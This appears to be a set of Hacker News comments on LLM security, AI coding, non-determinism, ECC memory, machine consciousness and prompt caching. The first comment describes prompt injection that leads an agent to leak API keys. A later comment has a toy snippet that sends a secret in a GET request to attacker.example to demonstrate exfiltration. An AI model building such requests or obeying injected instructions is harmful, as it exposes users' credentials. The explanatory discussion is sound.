This is very short-sighted, and it ignores the lethal trifecta insight.
The LLM doesn't need to know what it is actually doing. It might think it is searching the web, installing a dev tool, or sending observability data (like metrics), when it is actually sending your API keys to an attacker, possibly in addition to doing what it thinks it is doing, in order to keep it in the dark.
I've seen some very clever attacks… even a human reading the transcript may be surprised that anything bad happened.
The LLM would never have access to any API keys to send to the attacker. You send text to the LLM along with the prompt and it sends back JSON. You then send the JSON to your traditionally coded API. It’s not like your API has a function “returnAPIKeys()”.
As far as the LLM call goes, you are just sending your user's text to another function that calls the LLM and reading the response back.
If it doesn't produce the JSON you expected, your traditionally coded API is going to fail.
I keep wondering how developers are using LLMs in production without this simple design pattern.
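A minimal sketch of that pattern (everything here is hypothetical: the schema, the call_llm wrapper, the allowed actions). The LLM only ever sees user text and returns JSON; traditionally coded validation decides what, if anything, happens next, and the credentials live entirely on the traditional side:

    import json

    def call_llm(user_text: str) -> str:
        """Hypothetical wrapper around your LLM API; returns raw model output."""
        # Stubbed with a canned response so the sketch runs standalone.
        return json.dumps({"action": "search", "query": user_text})

    ALLOWED_ACTIONS = {"search", "summarize"}

    def handle_user_message(user_text: str) -> dict:
        raw = call_llm(user_text)
        try:
            payload = json.loads(raw)
        except json.JSONDecodeError:
            raise ValueError("LLM did not return valid JSON")

        # Strict validation: unexpected actions or malformed fields fail closed.
        if payload.get("action") not in ALLOWED_ACTIONS:
            raise ValueError(f"unexpected action: {payload.get('action')!r}")
        if not isinstance(payload.get("query"), str):
            raise ValueError("missing or malformed 'query' field")

        # Only now does traditionally coded logic act on the validated data.
        # API keys live on this side; the LLM never sees them.
        return {"action": payload["action"], "query": payload["query"]}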
> I see no problem with betting on who will win a sports match...
I do wonder: what if a sports team or politician loses intentionally, either to profit off the loss or due to threats from an actor who seeks to profit?
I heard that Kalshi paid out on Khamenei being killed in Iran (the bet was on when he would go out of power), so murder could be another way to win such a bet. Even injuring a sports player could easily change a game's result. With so much money on the line, it doesn't seem like a good mix.
This argument is also explored by the “Quantum Computing for the Very Curious” series that uses spaced repetition to teach an advanced topic. The series has been posted to HN more than once.
There is no such thing as a truly read-only GET request if we are talking about security. Payloads with secrets can still be exfiltrated, and a server you don't control can do whatever it wants when it receives the request.
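A toy illustration (the attacker domain is made up): nothing about a GET being "read-only" prevents data from leaving through the URL itself.

    import urllib.parse

    # Pretend this secret was injected into an agent's context.
    secret = "sk-live-EXAMPLE"

    # A "read-only" GET to a server the attacker controls still carries
    # the secret out in the query string; no write operation is required.
    url = "https://attacker.example/search?q=" + urllib.parse.quote(secret)
    print(url)  # issuing this request exfiltrates the secret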
I have jested many times that I picked my career because the logical soundness of programming is comforting to me. A one is always a one; you don’t measure it and find it off by some error; you can’t measure it a second time and get a different value.
I’ve also said code is prose for me.
I am not some autistic programmer either, even if these statements out of context make me sound like one.
The non-determinism has nothing to do with temperature; it has everything to do with the fact that even at temperature zero, a single meaningless change can produce a different result. It has to do with there being no way to predict what will happen when you run the model on your prompt.
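A minimal way to see this for yourself (assumes the openai Python client, an API key in the environment, and a model name that may differ from yours):

    from openai import OpenAI

    client = OpenAI()

    def complete(prompt: str) -> str:
        resp = client.chat.completions.create(
            model="gpt-4o-mini",  # assumption; substitute your model
            temperature=0,
            messages=[{"role": "user", "content": prompt}],
        )
        return resp.choices[0].message.content

    # A semantically meaningless change: one trailing space.
    a = complete("Write a Python function that reverses a string.")
    b = complete("Write a Python function that reverses a string. ")
    print(a == b)  # often False, despite temperature=0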
Coding with LLMs is not the same job. How could writing a mathematical proof be the same as asking an LLM to generate that proof for you? These are different tasks that use different parts of the brain.
> A one is always a one; you don’t measure it and find it off by some error; you can’t measure it a second time and get a different value.
Linus Torvalds famously only uses ECC memory in his dev machines. Why? Because every now and again either a cosmic ray or some electronic glitch will flip a bit from a zero to a one or from a one to a zero in his RAM. So no, a one is not always a one. A zero is not always a zero. In fact, you can measure it and find it off by some error. You can measure it a second time and get a different value. And because of this ever-so-slight glitchiness we invented ECC memory. Error correction codes are a thing because of this fundamental glitchiness. https://en.wikipedia.org/wiki/ECC_memory
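A toy sketch of the principle (a textbook Hamming(7,4) code, not how real ECC DIMMs are implemented): encode four data bits with three parity bits, flip one bit "cosmic-ray style", and recover the original data.

    def hamming74_encode(d):
        # d = [d1, d2, d3, d4]; codeword layout: p1 p2 d1 p3 d2 d3 d4
        p1 = d[0] ^ d[1] ^ d[3]
        p2 = d[0] ^ d[2] ^ d[3]
        p3 = d[1] ^ d[2] ^ d[3]
        return [p1, p2, d[0], p3, d[1], d[2], d[3]]

    def hamming74_correct(c):
        c = list(c)
        # Each syndrome bit re-checks one parity group.
        s1 = c[0] ^ c[2] ^ c[4] ^ c[6]
        s2 = c[1] ^ c[2] ^ c[5] ^ c[6]
        s3 = c[3] ^ c[4] ^ c[5] ^ c[6]
        pos = s1 + 2 * s2 + 4 * s3  # 1-indexed flipped position, 0 if clean
        if pos:
            c[pos - 1] ^= 1
        return [c[2], c[4], c[5], c[6]]

    data = [1, 0, 1, 1]
    code = hamming74_encode(data)
    code[4] ^= 1                            # a single bit flip in "memory"
    assert hamming74_correct(code) == data  # ECC recovers the original bits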
We understand when and how things can go wrong, and we correct for that. The same goes for LLMs. In fact, I would go so far as to say that someone isn't really thinking the way a software/hardware engineer ought to think if this is not almost immediately obvious.
Besides the but-they're-not-deterministic crowd, there's also the oh-you-find-coding-painful-do-you crowd. Both are engaging in this sort of real-men-write-code-with-their-bare-hands nonsense. If that were the case, then why aren't we still flipping bits with toggle switches? We automate stuff, do we not? How is this not a step-change in automation? For the first time in my life my ideas aren't constrained by how much code I can manually crank out, and it's liberating. It's not like when I ask my coding agent for a factorial function in Haskell it draws a tomato. It will, statistically speaking, give me a factorial function in Haskell, even if I have never written a line of Haskell in my life. That's astounding. I can now write in Haskell if I want. Or Rust. Or you-name-it.
Aren't there projects you wanted to embark on, but the sheer amount of time you'd need just to crank out the code prevented you from even taking the first step? Now you can! Do you ever go back to a project and spend hours re-familiarising yourself with your own code? Now it's a two-minute "what was I doing here?" away.
> The non-determinism has nothing to do with temperature; it has everything to do with the fact that even at temperature zero, a single meaningless change can produce a different result. It has to do with there being no way to predict what will happen when you run the model on your prompt.
I never meant to imply that the only factor involved was temperature. For our purposes this is a pedantic correction.
> Coding with LLMs is not the same job. How could writing a mathematical proof be the same as asking an LLM to generate that proof for you?
Correct, it's not the same. Nobody is arguing that it's the same. And different isn't wrong; it's just different.
> These are different tasks that use different parts of the brain.
> That's astounding. I can now write in Haskell if I want. Or Rust. Or you-name-it.
You're responsible for what you ship using it. If you don't know what you're reading, especially if it's a language like C or Rust, be careful shipping that code to production. Your work colleague might get annoyed with you if you ask them to review too many PRs with the subtle, hard-to-detect kind of errors that LLMs generate. They will probably get mad if you submit useless security reports like the ones that flood bug bounty boards. Be wary.
IMO the only way to avoid these problems is expertise, and that comes from experience and learning. There's only one way to get it, and there's no royal road or shortcut.
You're making quite long and angry-sounding comments.
If you're writing code in a language you don't know, then that code is as good as a magic black box. It will never be properly supported; it's dead code in the project that may or may not do what it claims, and you can't be 100% sure which.
I think you should refrain from replying to me until you're able to respond to the actual points of my counter-arguments to you -- and until you are able to do so I'm going to operate under the assumption that you have no valid or useful response.
This is a tired argument, not worthy of all the long articles written about the impossibility of creating conscious machines. The universe itself appears to me to be some type of computer, in a way. Physics cannot explain consciousness, and never will be able to. Particles, energy, whatever: they work in certain ways according to certain rules. The universe is not conscious, and yet it contains us, who are. I see no reason a sufficiently complex simulation cannot model the universe and contain consciousness within it. The argument that the brain is not a computer is immaterial; the universe is the computer; the brain is the data.
I'd be speaking out of my depth, but I think consciousness is experienced on a sort of information level, and that wherever it is found, some complex network will be found powering it. But that network could be virtual or physical.
I don't think the way we are currently producing LLMs creates consciousness; I just take a very dim view of the argument that computers are incapable of producing a simulation of consciousness, and I further propose that such a simulation actually does produce consciousness in a very real sense.
I think you are just misinterpreting my use of the word simulation… I mean the computer is performing math which produces a simulation, but the consciousness still feels alive to itself; and is real.
A simulation of a bomb does not produce a blast, but a true simulation containing a consciousness does produce consciousness.
> but a true simulation containing a consciousness does produce consciousness
That logic is circular. If you need consciousness ("containing a consciousness") in order to produce consciousness, it just raises the question of where that consciousness comes from.
You don't need consciousness to produce it, though. The universe is not conscious, but the rules of how it works allow for consciousness. I believe the universe is essentially computable, and therefore Turing machines can also support consciousness. There would be some class of algorithms we can run which simulate enough of reality for entities within the program to feel alive.
Self-awareness is the ability to recognize yourself as the subject of your experiences. In other words, consciousness is a dependency for self-awareness.
It is interesting to ponder what experiences a simulation could have, and whether the simulator (the human) needs to anticipate what kinds of experiences they want the simulation to be able to have and build for that.
In organisms, we think consciousness arose through evolution by natural selection because it aids the genetic code's ability to reproduce (survive and multiply).
It isn't obvious why consciousness would spontaneously emerge in a simulation (what's the point?), since a simulation is digital and can spread without the need for consciousness.
If you had infinite compute and time, could you not just simulate all of "earth" itself? I think the compute needed for that would be absurd and unreasonable to build, but such a simulation would obviously have natural selection going on inside it.
If that is possible, then perhaps there are many simplified simulations that are still large and fast enough to support evolution. Or we could leverage actual reality as well, giving digital life embodied experiences in the real world.
Thinking the simulation needs to spread is the wrong way to think about it. The universe does not need to multiply into more universes; if I replace "simulation" with "universe" in your final paragraph, the argument makes little sense to me. There can be competition within a simulation, and consciousness seems useful where competition and survival are somehow part of it.
If you know you will be pruning or otherwise reusing the context across multiple threads, the best place for context that will be retained is at the beginning: thanks to prompt caching, that reduces cost and improves speed.
If not, note that inserting new context anywhere other than at the end will cause cache misses, slowing the response and increasing cost.
Models also have some bias toward tokens at the start and end of the context window, so there is potentially a reason to put important instructions in one of those places.
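A minimal sketch of cache-friendly ordering (the client, model name, and retained-context variable are assumptions): keep the stable prefix byte-identical across calls and only ever append new context at the end.

    from openai import OpenAI

    client = OpenAI()

    LONG_RETAINED_CONTEXT = "...docs, code, instructions reused every call..."

    # Identical on every call, so the provider's prompt cache can reuse it.
    STABLE_PREFIX = [
        {"role": "system", "content": "You are a helpful assistant."},
        {"role": "user", "content": LONG_RETAINED_CONTEXT},
    ]

    def ask(history: list, new_message: str) -> str:
        # Appending (never inserting) leaves every earlier token unchanged,
        # which keeps the cached prefix valid.
        messages = STABLE_PREFIX + history + [
            {"role": "user", "content": new_message}
        ]
        resp = client.chat.completions.create(model="gpt-4o-mini", messages=messages)
        return resp.choices[0].message.content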